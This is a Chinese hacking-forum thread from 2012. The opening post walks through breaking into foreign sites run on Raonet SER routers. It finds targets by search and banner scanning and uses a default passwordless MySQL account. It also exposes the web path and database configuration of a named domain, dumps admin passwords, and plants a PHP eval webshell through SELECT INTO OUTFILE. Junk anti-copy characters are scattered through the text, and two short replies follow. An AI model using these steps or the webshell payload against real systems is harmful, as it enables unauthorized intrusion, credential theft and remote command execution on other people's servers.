找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 3068|回复: 2
打印 上一主题 下一主题

利用某路由器漏洞入侵国外站点

[复制链接]
跳转到指定楼层
楼主
发表于 2012-12-10 10:30:18 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
  寻找存在漏洞的路由器方法:
* ?3 p$ a& ~$ L  c2 |9 L% D4 E' I
# A: {; |3 {( F1:google搜索'Raonet Subscriber Ethernet Router'
: v' i4 C: G9 \: G
& W) a9 O- N7 q/ F2:使用WebDAVScan扫80端口,http banner为thttpd/2.21b 23apr2001
- l1 N1 X- v1 U; @6 t; U1 a
) O& S# x$ k5 b! T6 h* a+ t3:扫mysql版本号判断,SER系列路由器使用的mysql版本4.0.14,默认有一个高权限的帐户mysql,口令为空。; ^: K2 T( P9 V. c/ x

; J' [( B% p3 z) X4 E1 Y//还有很多方法可以批量获取,这里不发了,请自食其力 公开了大家都玩不成....... I2 u0 }6 J; y- }/ h
, ~' U. w6 V2 |* @- \

# Y' @$ l: D+ P- Z
$ l0 \! ?  }( T入侵步骤:/ ]) m* H, l" l. R* G: n& A, T

/ M7 a2 J8 k  S1 J& S* v& G% X7 j1.爆web路径,http://www.yu1u.org/src/jpgraph_line.php
* Y7 w$ p7 v1 I2 ]6 c9 t; G1 ]
' f, _+ c/ a1 n2:查看数据库配置文件,http://www.yu1u.org/inc/conn_db.inc
0 L1 S+ |7 h# B" R+ @. r3 Z0 _3:得到密码后连接,查看GUI管理密码:: x7 t+ M) ]) a/ c) X3 i
use ser_5001 I; V, k9 Z7 y$ z
select id,passwd from user;+ a) R$ o+ _, s- E1 n8 `
4:通过数据库写入webshell,执行命令:9 V$ Y" m+ [9 Y  D( |- d4 d' c
use mysql;
  b, m6 h9 G" v( S4 b- h0 _9 y% Bcreate table ok(cmd TEXT);7 I! e6 S; Y! A
insert into ok values("<?php @eval($_POST[cmd])?>");& D. s- m3 E9 C0 x$ o
select * from ok into outfile "\/usr\/local\/www\/data\/src\/shell.php";$ e: {/ q- b4 E- q; @, {
drop table ok;( ^  u0 W) a1 j) U0 |: n0 M0 d  X

) b) [- a2 I+ D* ?; R7 T5:连接后门shell.php ; r0 ?2 V- t$ ?
$ [4 }6 W; ?: B$ U* A
6. 搞定!8 n6 o) A( o0 }5 ?9 i/ y# D: C

- P  v) G: {  S( _& v( r
回复

使用道具 举报

沙发
发表于 2013-7-27 20:06:50 | 只看该作者
这个后果可以很严重的说
回复 支持 反对

使用道具 举报

板凳
发表于 2013-7-29 12:07:54 | 只看该作者
不错哦,黑服务器补洞。。
回复 支持 反对

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表